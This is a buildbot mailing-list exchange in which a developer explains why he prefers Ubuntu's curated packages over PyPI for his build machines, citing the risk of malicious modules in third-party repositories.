[users at bb.net] debian packages?

[Dan Kegel]

On Tue, Feb 27, 2018 at 12:03 PM, Bill Deegan <bill at baddogconsulting.com> wrote:
> On Tue, Feb 27, 2018 at 12:43 PM, Dan Kegel <dank at kegel.com> wrote:
>> > Any reason you wouldn't use virtualenv and pip install for your buildbot
>> > install needs?
>>
>> It is inherently dangerous to trust third party package repositories.
>> I would like my build machines to be capable of running builds
>> without randomly downloading crap from this, that, and the other
>> marginally trustable third party collection of packages.
>>
>> Since I'm running Ubuntu, I already trust that one repository,
>> and I'd like to draw the line there.
>
>
> That's a pretty restrictive point of view, but if that suites your security
> requirements.
> You do realize that the debian packages are built from the same sources the
> pypi packages are (minus some minor packaging changes).  So in some sense
> the debian package is a third party package vs pypi (the primary
> distribution point for buildbot packages)

I trust ubuntu's curation and vulnerability patching more than I trust
pypi, which has a "sure, upload whatever crap you like" policy, IIRC.
Some adult supervision by a professional distro like Ubuntu or RH
seems appropriate if you care about security.

> Buildbot (historically) has pretty good development pace and if you're stuck
> with only the debian packages of such you'll be out of date, and missing
> some nice improvements  (performance, security issues, and feature wise)

That's ok.  I trust Ubuntu to provide commonly needed security fixes
for python modules.
And I'm happy with a time-based release rhythm rather than a rolling
release for my dependencies.

> In general I agree that adding debian repo's willy nilly is not a wise move,
> installing from pypi using pip (at least for buildbot) is not as much of a
> risk.

Given e.g. https://arstechnica.com/information-technology/2017/09/devs-unknowingly-use-malicious-modules-put-into-official-python-repository/
I would hope it's not just me.

I realize that insisting on security seriously impedes productivity.
Many developers would not be able to get their job done promptly
if they did not implicitly trust repositories like pypi and npm.
And I expect I will have to compromise on this frequently in the name
of getting things shipped.

>From time to time, the software I'm building/packaging has to pass
security audits from new customers, and you never know how
picky they're going to be... one of them someday is going to ask
tough questions, and might have a bias towards trusting RHEL or Ubuntu
and nothing else.  Stranger things have happened.

Anyway, that's why I'm happy that someone is working on debian
packages for buildbot!

Thanks,
Dan